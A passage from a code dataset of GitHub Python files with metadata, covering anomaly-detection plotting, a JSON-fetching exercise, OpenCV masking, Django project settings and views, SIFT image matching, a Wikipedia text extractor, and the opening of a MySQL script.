#plt.xlabel('week',fontsize = 12)\r\n    #plt.grid() \r\n    #plt.axhline(np.mean(basis_filter['total_sent_bytes']) + np.std(basis_filter['total_sent_bytes']), color='k',linestyle = '--')\r\n    #plt.axhline(np.mean(basis_filter['total_sent_bytes']) - np.std(basis_filter['total_sent_bytes']), color='k',linestyle = '--')\r\n    #plt.axhline(np.mean(basis_filter['total_sent_bytes']), color='m',linestyle = '--')\r\n    \r\n    clf = OneClassSVM(nu=0.2, kernel=\"rbf\", gamma=0.1)\r\n    normalize = preprocessing.scale(np.array(All_mean))\r\n    train = normalize[0:int(len(basis)/mode)]\r\n    test = normalize[int(len(basis)/mode):]\r\n    \r\n    train = np.reshape(train , (len(train),1))\r\n    test = np.reshape(test , (len(test),1))\r\n    Train_and_test = np.reshape(np.append(train[0:int(len(basis)/mode)] , test) , (len(np.append(train[0:int(len(basis)/mode)] , test)),1))\r\n    clf.fit(train)\r\n    clf.predict(test)\r\n    predict = clf.predict(Train_and_test)\r\n    Feature_df['if_abnormal'] = predict\r\n\r\n    up_bound = np.mean(Training) + np.std(Training)\r\n    low_bound = np.mean(Training) - np.std(Training)\r\n\r\n    Feature_df.loc[(Feature_df['mean'] > low_bound) & (Feature_df['mean'] < up_bound),'if_abnormal_iqr'] = 1\r\n    Feature_df['if_abnormal_iqr'] = Feature_df['if_abnormal_iqr'].fillna(-1)\r\n\r\n    plt.figure()\r\n    plt.scatter(np.arange(len(Feature_df)),Feature_df['mean'] , c = predict)\r\n    plt.axvline(int(len(basis)/mode), color='k',linestyle = '--',label = 'train_cut')\r\n\r\n\r\n    up_bound = max(Feature_df[(Feature_df['if_abnormal'] ==1) & (Feature_df['type'] =='Training')]['mean'])\r\n    low_bound = min(Feature_df[(Feature_df['if_abnormal'] ==1) & (Feature_df['type'] =='Training')]['mean'])\r\n#    up_bound = min(Feature_df[(Feature_df['if_abnormal'] ==-1) & (Feature_df['mean'] > normal_max)]['mean'])\r\n#    low_bound = max(Feature_df[(Feature_df['if_abnormal'] ==-1) & (Feature_df['mean'] < normal_min)]['mean'])\r\n#    up_bound = 1.8297095\r\n#    low_bound = -1.5197436\r\n    plt.xlabel('period')\r\n    plt.ylabel('mean')\r\n    plt.axhline(up_bound, color='m',linestyle = '--',label = 'up_bound')\r\n    plt.axhline(low_bound, color='m',linestyle = '--',label = 'low_bound')\r\n    plt.title('OCSVM (Mean)')\r\n    plt.legend()\r\n    \r\n    Feature_df.loc[ (Feature_df.if_abnormal == -1) & (Feature_df.if_abnormal_iqr == -1),'Last_abnormal'] = -1\r\n    Feature_df.loc[~( (Feature_df.if_abnormal == -1) & (Feature_df.if_abnormal_iqr == -1)),'Last_abnormal'] = 1\r\n    predict = Feature_df['Last_abnormal'].values\r\n    \r\n    \r\n    value['if_abnormal'] = np.nan \r\n    value['period'] = np.nan \r\n    source_data = value.copy().reset_index(drop=True)\r\n    for i in range(int(len(source_data)/mode)):\r\n        source_data.loc[0+i*mode : (i+1)*mode,'if_abnormal'] = predict[i]\r\n        source_data.loc[0+i*mode : (i+1)*mode,'period'] = int(i)\r\n    \r\n    \r\n    \r\n    # plot the abnormal segments\r\n    source_data = source_data[~source_data['if_abnormal'].isna()]\r\n    normal_part = source_data[source_data['if_abnormal'] == 1]\r\n    abnormal_part = source_data[source_data['if_abnormal'] == -1]\r\n    normal_part1 = pd.merge(normal_part , source_data[['ds']],on = ['ds'],how='right')\r\n    normal_part1 = normal_part1.sort_values(by = ['ds'])\r\n    \r\n    abnormal_part1 = pd.merge(abnormal_part , source_data[['ds']],on = ['ds'],how='right')\r\n    abnormal_part1 = abnormal_part1.sort_values(by = ['ds'])\r\n    \r\n    \r\n    plt.figure(figsize = (20,8))\r\n    plt.plot(source_data['ds'],source_data['unique_dest_cnt'],'b')\r\n    plt.plot(normal_part1['ds'],normal_part1['unique_dest_cnt'],'b',label = 'Mean Normal')\r\n    
plt.plot(abnormal_part1['ds'],abnormal_part1['unique_dest_cnt'],'lawngreen',label = 'Mean change')\r\n plt.title(key)\r\n plt.axvline(train_cut_date, color='k',linestyle = '--',label = 'train cut')\r\n plt.xlabel('ds')\r\n plt.ylabel('total_sent_bytes')\r\n plt.xticks(rotation = 90)\r\n plt.legend()\r\n plt.savefig('C:/Users/tony_tien/Desktop/git_project/peakdetection/PeriodChangeDetection/plot/{}.png'.format(key))\r\n plt.close()\r\n \r\n \r\n", "repo_name": "TonyLintz/perioddetection", "sub_path": "AnalysisCode/detect_amplitude.py", "file_name": "detect_amplitude.py", "file_ext": "py", "file_size_in_byte": 6703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.svm.OneClassSVM", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 102, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}]} +{"seq_id": "38077031991", "text": "import json\nimport urllib.request\nimport urllib.error\n\n# URL = 'http://py4e-data.dr-chuck.net/comments_42.json'\nURL = 'http://py4e-data.dr-chuck.net/comments_1136303.json'\n\nprint('Retrieving', URL) # Prints the URL\naddress = urllib.request.urlopen(URL) # Opens a connection to URL\ndata = address.read().decode() # read the data and converts to unicode for python\nprint('Retrieved', len(data), 'characters') # counting the length of data\n\ninfo = json.loads(data) # Creates a JSON object from data\ninfo = info[\"comments\"] # points at the comments key of the object\n\ntotal = 0 # total accumulation of value['count']\ncount = 0 # the number of occurrence of key['count']\n\nfor item in info: # iterate through the info object\n count += 1 # increment count for occurrence\n total += int(item[\"count\"]) # accumulation of sum (parse value as int, as initially its a string)\n\nprint(\"Count: \", count) # print count\nprint(\"Sum: \", total) # print total\n", "repo_name": "CodePalmer-io/UM--JSONtest", "sub_path": "JSONTest.py", "file_name": "JSONTest.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "52", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 9, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "12216991283", "text": "import numpy as np\nimport argparse\nimport cv2 \n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help = \"Path to the image\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original Image\", image)\ncv2.waitKey(0)\n\nmask = np.zeros(image.shape[:2], dtype = \"uint8\") # create an array of zeros to serve as the mask\n(cX, cY) = (image.shape[1] // 2, image.shape[0] // 2) # compute the center X and Y of the image\ncv2.rectangle(mask, (cX - 75, cY - 75), (cX + 75, cY + 75), 255, -1) # make a rectangle that's 150x150\ncv2.imshow(\"Mask\", mask)\ncv2.waitKey(0)\n\nmaskedImage = cv2.bitwise_and(image, image, mask = mask)\ncv2.imshow(\"Masked Image\", maskedImage)\ncv2.waitKey(0)\n\ncircleMask = np.zeros(image.shape[:2], dtype = \"uint8\")\ncv2.circle(circleMask, (cX, cY), 300, 255, -1) # 300 radius of mask\nmasked = cv2.bitwise_and(image, image, mask = circleMask)\ncv2.imshow(\"Circle Mask on Image\", masked)\ncv2.waitKey(0)", "repo_name": "elibrowne/opencv-work", "sub_path": "masking.py", "file_name": "masking.py", "file_ext": "py", "file_size_in_byte": 963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "23473414644", "text": "\nimport os\nfrom pathlib import Path\nimport json\nfrom django.core.exceptions import ImproperlyConfigured\n\nBASE_DIR = Path(__file__).resolve().parent.parent\nwith open(os.path.join(BASE_DIR,'credentials.json')) as credentials_file:\n credentials=json.load(credentials_file)\n\ndef get_secret(setting,secrets=credentials):\n \"\"\"Get secret settings or fail with Improperly configured\"\"\"\n try:\n return secrets[setting]\n except KeyError:\n raise ImproperlyConfigured(\"Set the {} setting\".format(setting))\n\n\nSECRET_KEY = get_secret('SECRET_KEY')\n\nDEBUG = True\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'core',\n 'baton',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 
'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django_countries',\n 'django.contrib.sites',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'corsheaders',\n 'rest_auth',\n 'rest_auth.registration',\n 'rest_framework',\n 'rest_framework.authtoken',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'main_api.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'main_api.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Asia/Kolkata'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_ROOT = 'staticfiles'\nSTATICFILES_DIRS = (\nos.path.join(BASE_DIR, 'static',),)\nSTATIC_URL = '/static/'\n\n# Default primary key field type\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nACCOUNT_EMAIL_VERIFICATION = 'none'\nSITE_ID = 1\nLOGIN_URL = 'account_login'\nACCOUNT_EMAIL_REQUIRED=True\nACCOUNT_EMAIL_VERIFICATION = \"optional\"\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_UNIQUE_EMAIL = True\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n \"django.contrib.auth.backends.ModelBackend\",\n\n # `allauth` specific authentication methods, such as login by e-mail\n \"allauth.account.auth_backends.AuthenticationBackend\",\n)\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.AllowAny',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n ),\n}\n\n# REST_AUTH_SERIALIZERS = {\n# 'LOGIN_SERIALIZER': 'core.serializers.LoginUserSerializer',\n# }\n\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_CREDENTIALS = True\nCSRF_COOKIE_SECURE = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SAMESITE = 'None'\nSESSION_COOKIE_SAMESITE = 'None'\n\n# django Email\n# EMAIL_BACKEND = 
'django.core.mail.backends.smtp.EmailBackend'\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_USE_TLS = True\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = get_secret('EMAIL_HOST_USER')\n# EMAIL_HOST_PASSWORD = get_secret('EMAIL_HOST_PASSWORD')\n# DEFAULT_FROM_EMAIL = EMAIL_HOST_USER\n\n\n\n\n# AWS_ACCESS_KEY_ID = get_secret('AWS_ACCESS_KEY_ID')\n# AWS_SECRET_ACCESS_KEY = get_secret('AWS_SECRET_ACCESS_KEY')\n# AWS_STORAGE_BUCKET_NAME = get_secret('AWS_STORAGE_BUCKET_NAME')\n# AWS_S3_FILE_OVERWRITE = False\n# AWS_DEFAULT_ACL = None\n# AWS_S3_REGION_NAME = 'ap-south-1'\n# AWS_S3_SIGNATURE_VERSION = get_secret('AWS_S3_SIGNATURE_VERSION')\n# DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'", "repo_name": "PKSingh0017/api-fest-2022", "sub_path": "main_api/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 5097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}]} +{"seq_id": "1388926215", "text": "from django.urls import path\nfrom .views import home,insert_emp,display_all,update_emp,delete_emp\nurlpatterns = [\n path('',home,name=\"home\"),\n path('insert/',insert_emp,name=\"create\"),\n path('displayall/',display_all,name=\"retrieve_all\"),\n path('update//',update_emp,name=\"update\"),\n path('delete//',delete_emp,name=\"delete\"),\n\n\n]", "repo_name": "vedasaipriya/django_Session3_CRUD", "sub_path": "database/crud/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 4, "usage_type": "call"}, {"api_name": "views.home", "line_number": 4, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "views.insert_emp", "line_number": 5, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.display_all", "line_number": 6, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.update_emp", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.delete_emp", "line_number": 8, "usage_type": "argument"}]} +{"seq_id": "29822640646", "text": "import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\n\ndef findTranform(sourceImage):\n MIN_MATCH_COUNT = 10\n\n #sourceImage = 
captureImage.captureFrame()\n    queryImage = cv.cvtColor(sourceImage, cv.COLOR_BGR2GRAY)\n    refImage = cv.imread('img/kimble_ref_800.jpg',0) # trainImage\n\n    cv.normalize(sourceImage, sourceImage, 0, 255, cv.NORM_MINMAX)\n    cv.normalize(queryImage, queryImage, 0, 255, cv.NORM_MINMAX)\n\n    # Initiate SIFT detector\n    sift = cv.xfeatures2d.SIFT_create()\n\n    # find the keypoints and descriptors with SIFT\n    kp1, des1 = sift.detectAndCompute(queryImage,None)\n    kp2, des2 = sift.detectAndCompute(refImage,None)\n\n    FLANN_INDEX_KDTREE = 0\n    index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n    search_params = dict(checks = 50)\n\n    flann = cv.FlannBasedMatcher(index_params, search_params)\n\n    matches = flann.knnMatch(des1,des2,k=2)\n\n    # store all the good matches as per Lowe's ratio test.\n    good = []\n    for m,n in matches:\n        if m.distance < 0.7*n.distance:\n            good.append(m)\n\n    if len(good)>MIN_MATCH_COUNT:\n        src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n        dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n        M, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)\n        matchesMask = mask.ravel().tolist()\n\n        h,w = queryImage.shape\n        pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n        dst = cv.perspectiveTransform(pts,M)\n\n        refImage = cv.polylines(refImage,[np.int32(dst)],True,255,3, cv.LINE_AA)\n\n    else:\n        print(\"Not enough matches are found - %d/%d\" % (len(good),MIN_MATCH_COUNT))\n        matchesMask = None\n    \n    #draw_params = dict(matchColor = (0,255,0), # draw matches in green color\n    #               singlePointColor = None,\n    #               matchesMask = matchesMask, # draw only inliers\n    #               flags = 2)\n\n    #img3 = cv.drawMatches(queryImage,kp1,refImage,kp2,good,None,**draw_params)\n\n    #plt.imshow(img3, 'gray'),plt.show()\n    \n    #sourceImage = cv.warpPerspective(sourceImage, M, refImage.shape)\n    #print(M)\n    #cv.imshow(\"final\", sourceImage)\n    #cv.waitKey(0)\n\n    return M\n\n", "repo_name": "viljamip/kimble-die-detector", "sub_path": "findPerspective.py", "file_name": "findPerspective.py", "file_ext": "py", "file_size_in_byte": 2329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.normalize", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.xfeatures2d.SIFT_create", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.xfeatures2d", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.FlannBasedMatcher", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.findHomography", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.RANSAC", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.perspectiveTransform", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.polylines", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int32",
"line_number": 47, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 47, "usage_type": "attribute"}]} +{"seq_id": "5503348637", "text": "from django.shortcuts import render\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.views.generic import CreateView\n\nsign_up = CreateView.as_view(\n form_class=UserCreationForm,\n # template_name=\"accounts/sign_up_form.html\",\n template_name=\"form.html\",\n success_url=settings.LOGIN_URL,\n)\n\nsign_in = LoginView.as_view(\n template_name = \"form.html\",\n)\n\nsign_out = LogoutView.as_view(\n next_page = settings.LOGIN_URL,\n)\n\n\n# def sign_up(request):\n# pass\n\n# def sign_in(request):\n# pass\n\n# def sign_out(request):\n# pass\n\n@login_required\ndef profile(request):\n return render(request, \"accounts/profile.html\")", "repo_name": "raoner/code-lion", "sub_path": "18_220705_DJANGO06/my_youtube/accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 804, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.generic.CreateView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.settings.LOGIN_URL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.settings.LOGIN_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "34573530169", "text": "import os\nimport argparse\nimport json\nimport nltk\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--folder\",\n type=str,\n required=True,\n help=\"(str) the absolute path to the folder containing the folders of wikipedia jsons\")\n parser.add_argument(\"--write_file\",\n required=True,\n help=\"(str) path and filename to the txt file where wikipedia is going to be written to\")\n args = parser.parse_args()\n if args.folder[-1]!=\"/\":\n args.folder= args.folder+\"/\"\n\n write_file = open(args.write_file,\"w\")\n\n for folder in os.listdir(args.folder):\n for open_file_name in os.listdir(args.folder+folder+\"/\"):\n\n print(open_file_name)\n with open(args.folder+folder+\"/\"+open_file_name, \"r\") as open_file:\n for article in open_file:\n json_obj = json.loads(article)\n text = json_obj[\"text\"]\n\n #removes title from text, which occurs before first line break\n dex=0\n while text[dex:dex+1]!=\"\\n\":\n dex+=1\n text = text[dex+1:]\n\n #removes all new lines\n text = text.replace(\"\\n\",\" \")\n\n 
sentences = nltk.tokenize.sent_tokenize(text)\n for sentence in sentences:\n write_file.write(sentence+\"\\n\")\n\n write_file.write(\"\\n\")\n\n\n write_file.close()\n\nif __name__==\"__main__\":\n main()\n", "repo_name": "saurabhkulkarni77/DistillBERT", "sub_path": "extract_wikipedia_for_bert/extract_jsons.py", "file_name": "extract_jsons.py", "file_ext": "py", "file_size_in_byte": 1619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 60, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 39, "usage_type": "call"}, {"api_name": "nltk.tokenize", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "11729724676", "text": "#!/usr/bin/python3\n'''script that lists all cities from the database hbtn_0e_4_usa'''\nimport MySQLdb\nimport sys\n\n\nif __name__ == '__main__':\n db_connection = MySQLdb.connect(\n host='localhost',\n user=sys.argv[1],\n password=sys.argv[2],\n 